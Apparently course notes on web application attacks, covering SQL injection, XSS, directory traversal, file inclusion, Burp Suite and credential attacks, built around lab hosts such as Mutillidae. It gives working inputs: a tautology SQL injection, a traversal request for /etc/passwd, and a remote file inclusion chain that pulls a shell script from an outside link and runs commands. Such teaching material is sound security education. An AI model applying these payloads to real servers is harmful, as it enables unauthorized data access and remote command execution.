Injection Vulnerabilities

Injections

Injection attacks occur when an attacker supplies untrusted input to an application

The payload contains malicious data that is processed as part of a query or command that alters the way a program is intended to function

Injections commonly occur in fields and forms on web applications

Cross-Site Scripting: A submitted user input that can run malicious scripts against a website and depends on the application modifying the client-side code with a user’s input

SQL Injection: Submitted user input that can run SQL commands against a database

Unintended SQL Queries

Structure of a SQL Database and Query:

select userid, salary from salaries where userid = 'jsmith'

• select: Used to read or select data from a table
• userid, salary: Two fields requested to be displayed
• from salaries: Instructs the program to select the data from the salaries table
• where userid= 'jsmith': Instructs the program to only return records where the user id is “jsmith”

Example of modification of intended query to create unintended results:

select userid, salary from salaries where userid = 'jsmith' OR '1' = '1'

The OR '1' = '1' translates to true and will display the entire table

XSS

Cross-Site Scripting (XSS): Web application attack that injects malicious scripts into vulnerable web applications

Impacts include:

• Redirecting to a spoof page
• Stealing the user’s cookies
• Adding a keylogger onto the user’s machine
• Downloading malware to the user’s machine

Reflected (Non-Persistent) XSS: Depends on the user input immediately returned to the user and not stored on the server

Stored (Persistent) XSS: Depends on the user input being stored on the server

Back-End Component Vulnerabilities

Directory Traversal

Directory Traversal: An attacker accesses files and directories from a web application outside a user’s authorized permissions

Process includes identifying the syntax the website uses to pull files from the server:

<http://192.168.13.35/directory_traversal_1.php?page=message.txt>

• The site pulls files using the query ?page=message.txt

Changing the target file will potentially trigger the site to load the provided file:

<http://192.168.13.35/directory_traversal_1.php?page=bugs_owasp_top10_2010.txt>

• This will load the file bugs_owasp_top10_2010.txt

Files outside of the site directory can be accessed as well:

<http://192.168.13.35/directory_traversal_1.php?page=/etc/passwd>

Real-World Challenges and Mitigations

Security analysts would likely not have access to the filesystems

Mitigation methods include limiting user input when calling for files and using input validation to limit the user’s ability to modify the file being accessed

Web Application Back-End Code

Local File Inclusion: Web application vulnerability in which an attacker tricks the application to run unintended back-end code or scripts that are local to the application’s filesystem

PHP (Hypertext Preprocessor) is a server-side language used to develop web applications

PHP is often used to connect to back-end databases, such as MySQL, and creating and working with website cookies

PHP Process:

1. User visits a website and selects a link directing them to a .php webpage
2. An HTTP request is made to the server
3. The web server pre-processes the PHP scripts to request the requested items
4. The data base returns the requested data, and the web server sends the processed HTML back to the user with an HTTP response
5. The user’s browser renders the HTML to display the list of boats back to the user

Remote File Inclusion

Remote File Inclusion: Using remote files or scripts to conduct an attack similar to Local File Inclusion

Process:

1. Identify the syntax of the URL calling the PHP file: http://192.168.13.27/index.php?page=arbitrary-file-inclusion.php
   1. index.php is the file
   2. ?page=arbitrary-file-inclusion.php is the parameter
2. Replace the parameter with a new parameter: [http://192.168.13.27/mutillidae/index.php?page=](<http://192.168.13.27/mutillidae/index.php?page=>)<http://google.com>
3. Change the parameter to use another PHP script that allows passing bash commands to the server: http://192.168.13.27/mutillidae/index.php?page=https://tinyurl.com/y498epmz
4. Pass a command using the syntax &cmd=[command]: [http://192.168.13.27/mutillidae/index.phppage=https://tinyurl.com/y498epmz&](<http://192.168.13.27/mutillidae/index.php?page=https://tinyurl.com/y498epmz&>)cmd=ls

Web Application Tools

Intro to Web Proxies and Burp Suite

Web Proxy: Intermediary between the client and the server

Organizations use proxies to monitor and block harmful web traffic, as some web proxies block specific websites

Individuals use proxies to browse anonymously

Burp Suite is a web application security tool that lies between the browser and the target application

Session Management Vulnerabilities

Session Hijacking: A malicious user obtains another user’s unique session cookie and hijack the victim’s private session

Conducting Brute Force Attacks with Burp Intruder

Credential Stuffing: Using lists of usernames to conduct brute force attacks that were obtained from breaches of other websites

Password Spraying: Using a single weak password against a large list of usernames